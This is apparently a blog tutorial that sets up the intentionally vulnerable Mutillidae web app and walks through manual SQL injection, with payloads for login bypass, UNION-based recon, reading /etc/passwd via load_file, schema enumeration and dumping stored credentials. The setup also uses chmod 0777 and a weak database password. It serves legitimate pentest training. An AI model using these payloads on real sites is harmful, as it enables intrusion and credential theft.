A2-Cross Site Scripting (XSS)
A3-Broken Authentication and Session Management
A4-Insecure Direct Object References
A5-Cross Site Request Forgery (CSRF)
A7-Insecure Cryptographic Storage
A8-Failure to Restrict URL Access
A9-Insufficient Transport Layer Protection
A10-Unvalidated Redirects and Forwards
– ** –
Before we can install Mutillidae, we need to configure our LAMP (Linux Apache Mysql PHP, Python or Perl) server first. First we need to install Apache, type this in your terminal:
sudo apt-get install apache2
Then install PHP:
sudo apt-get install php5 libapache2-mod-php5
Install the MYSQL server:
sudo apt-get install mysql-server
After that it should prompt you to setup the password for your Mysql server. In my case, I put ‘mysqlroot’ as my password just for demo purposes really although it’s not really advisable to use a weak password in a live server.
Now setup your phpmyadmin (Optional):
sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
Change the permission of your /var/www folder to make sure you will have all the rights to read, write and execute files by typing this command in your terminal:
sudo chmod -R 0777 /var/www
To check if the installation is successful navigate through this link in your browser: http://localhost/ or http://127.0.0.1/
If you see something that says ‘It Works!’ then you are done setting up your LAMP server. Now time to install Mutillidae! Download and extract Mutillidae in the /var/www directory:
Next up we need to configure the config.inc which contains the dbhost, dbuser, dppass, and dbname configurations:
By default the value $dbpass is left blank so we need to put the root password for Mysql which you entered during the installation of mysql-server. In my case I put mysqlroot.
Make sure you have already started the services for Mysql and Apache but if not you can just type these commands in the terminal:
service mysql start
service apache2 start
Then open your web browser again and point it to 127.0.0.1/mutillidae/ or localhost/mutillidae/. Next, let’s have the web application setup the database automatically by clicking Core Controls > Setup/Reset the DB at the left side or Setup/Reset the DB at the upperight corner.
The link should take you to 127.0.0.1/mutillidae/set-up-database.php.
If you see no errors then you are ready to play with Mutillidae. =)
Manual SQL Injection
Now time for some action! \m/
For me, the best way to understand and learn SQL (Structured Query Language) Injection if you are into web application penetration testing is to learn it manually rather than using automated tools and set up an open source web application that is vulnerable. Although I don’t discourage using tools for automation since tools can also be of great help. My only point is that, we should at least get familiar with the use of SQL statements for attacking a web application.
To tell you honestly, I learned manual SQL Injection with the help of a mentor without any knowledge about SQL and PHP; and when I already had a formal class at college about SQL, Database Management, and PHP I was able to apply it and enjoyed it. So thank you mentor.. (You know who you are)
Simple Bypass Authentication
This is one of the pages where you can practice SQL Injection. Yeah, a login form:
Let’s try to insert ‘ (single quote) to check if we can to cause errors to see how the web application reacts.
As what we can see from the image above, the actual SQL Query is SELECT * FROM accounts WHERE username=” AND password=”, if that is the case then we can attack this application using a simple bypass authentication method like inserting ‘ or ’1′ = ’1 on the password field which then forces the login form a selection of a valid password because the evaluation of ’1′=’1′ is always true. The query pulls out all the columns of the accounts table because it says SELECT * FROM accounts.
Finding the number of columns
To find the number of columns we use the ORDER BY syntax and increment the number by 1 until the site returns to error. We use a comment character at the end or you may use the comment sequence: - -. We insert this on the login form (you can choose username/password filed):
‘ order by 1 #
‘ order by 2 #
‘ order by 3 #
‘ order by 4 #
And because the query ‘ order by 5 # returns an error therefore there are four columns in the table, it gives an error on the 5th column because it does not exist on the records.
Union Select 101
And now, we can use the UNION Select Statement for information gathering and recon attacks.
‘ union select 1,2,3,4 #
From the image above, you can tell that the page looked a bit messed up and that three numbers on the page appeared. These numbers are the column numbers we can get information from. We will replace them with statements later on. In fact you can just replace the values of the three numbers that are identical to the numbers you inputted on the union select. Take for example these:
‘ union select 1,2,’shipcode was here’,4 #
Finding the MySQL version
To determine the Mysql version use @@version / version() on the desired number of column where you can get information. For example I choose three then the statement should be:
‘ union select 1,2,@@version,4 #
Finding out the location of database directory
We use @@datadir instead of @@version:
‘ union select 1,2,@@datadir,4 #
Finding out the current database user
‘ union select 1,system_user(),3,4 #
‘union select 1,user(),3,4 #
Using Load_File for directory traversal
MySQL LOAD_FILE() reads the file and returns the file contents as a string.
‘ union select 1,load_file(‘/etc/passwd’),3,4 #
This allows the attacker to gather some info about the directories and if he/she gets to see the /etc/shadow file then it’s possible for the attacker the crack the encrypted passwords.
Finding the table_names
Usually if the MySQL version is < 5 (4.x.x, 3.x.x, etc), column and table names can actually be guessed and the most common table names include: user/s, admin/s, member/s. But if you really wanna find the table name then you need to inject the website to find the table names. You can insert this syntax:
‘ union select 1,2,concat(table_name),4 from information_schema.tables where table_schema=database() #
The query above will show only the tables for the database of this web application which is owasp10 because of the WHERE clause : where table_schema=database(). But if you don’t use the where clause, it will also show other tables of the databases in the system.
Finding the columns
So it’s obvious that we need to get the information from the accounts table_name. So what’s next is to find the all columns of the database. It’s just like getting the table_names because you just change table_name to column_name and information_schema.tables to information_schema.columns, the statement should be:
‘ union select 1,2,concat(column_name),4 from information_schema.columns where table_schema=database() #
Pawning the username and passwords in the database of the web application
Now that we have the table names, and column names we can put them together and get some information from them.We need to use the union method to find the columns username and password from the table account. Thus, the statement below allows an attacker to dump the username and password of admin:
‘ union select 1,username,password,4 from accounts #
Now we got the usernames and passwords =)
-= GAME OVER! =-
~ An expanded and updated article from my original work or article at The ProjectX Blog – Information Security Redefined about Manual SQL Injection Guide for Mutillidae – Web Pentesting